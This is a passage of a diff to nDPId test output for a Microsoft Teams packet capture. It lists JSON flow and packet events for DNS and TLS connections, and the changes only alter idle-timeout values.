00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1587041681754,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1587041681754,"pkt":"KDc3AG3IEBMx8Tl2CABFAACo\/M1AADkRwR\/AqAEBwKgBBgA1x1kAlAAAiC2BgAABAAMAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAHADAAFAAEAAAb4ACQPYXNtLWFwaS1wcm9kLWV1DnRyYWZmaWNtYW5hZ2VyA25ldADAMgAFAAEAAAEsABoOd2V1MS1hcGktc2t5cGUIY2xvdWRhcHDAUcBiAAEAAQAAAAUABDRyS0U="} 00793{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":875,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041681754,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"eu-api.asm.skype.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.69"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} -00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} -00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681755,"flow_last_seen":1587041681755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681755,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1587041681755,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681755,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex7AbtPkLhOAAAAALAC\/\/8ixgAAAgQFtAEDAwUBAQgKMISsNwAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681772,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8MUxAAG0Gmwk0cktGwKgBBgG77HoxlVjpglGjsqASIACccwAAAgQFoAEDAwgEAggKVud31zCErC0="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681772,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux6AbuCUaOyMZVY6oAQEAnbCgAAAQEICjCErEZW53fX"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":879,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681745,"flow_last_seen":1587041681772,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1587041681772,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041681786,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PqJAAGwGjrQ0cktFwKgBBgG77HsaOOK2T5C4T6ASIABGlgAAAgQFoAEDAwgEAggKVN17aDCErDc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041681786,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex7AbtPkLhPGjjit4AQEAmFKgAAAQEICjCErFNU3Xto"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041681755,"flow_last_seen":1587041681786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1587041681786,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682076,"flow_last_seen":1587041682076,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682076,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1587041682076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682076,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux8AbuMg\/cHAAAAALAC\/\/+l4gAAAgQFtAEDAwUBAQgKMIStbAAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682077,"flow_last_seen":1587041682077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041682077,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":933,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1587041682077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041682077,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VLAqAEGNHJLRex9AbuFeblcAAAAALAC\/\/\/qlgAAAgQFtAEDAwUBAQgKMIStbQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1587041682106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682106,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8XUVAAGwGcBA0cktGwKgBBgG77HwdJJF2jIP3CKASIACM5QAAAgQFoAEDAwgEAggKVscEoDCErWw="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1587041682106,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682106,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V3AqAEGNHJLRux8AbuMg\/cIHSSRd4AQEAnLdwAAAQEICjCErYpWxwSg"} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":936,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682076,"flow_last_seen":1587041682107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1587041682107,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-prod.asyncgw.teams.microsoft.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041682108,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8CPlAAG0Gw100cktFwKgBBgG77H37toO1hXm5XaASIACQKwAAAgQFoAEDAwgEAggKVQ929DCErW0="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041682108,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+V7AqAEGNHJLRex9AbuFebld+7aDtoAQEAnOvQAAAQEICjCErYtVD3b0"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":939,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041682077,"flow_last_seen":1587041682108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041682108,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1587041682129,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1587041682129,"pkt":"EBMx8Tl2KDc3AG3ICABFAABIVE8AAP8R4\/3AqAEGwKgBAcFqADUANJ5TmvIBAAABAAAAAAAABmNvbmZpZwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAE="} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"teams.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041682129,"flow_last_seen":1587041682129,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041682129,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":49514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"config.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01167{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":969,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1587041682077,"flow_last_seen":1587041682140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6185,"flow_avg_l4_payload_len":618,"midstream":0,"thread_ts_msec":1587041682140,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"eu-api.asm.skype.com","server_names":"*.asm.skype.com","ja3":"74d5fa154a7fc0a7c655d8eaa34b89bf","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 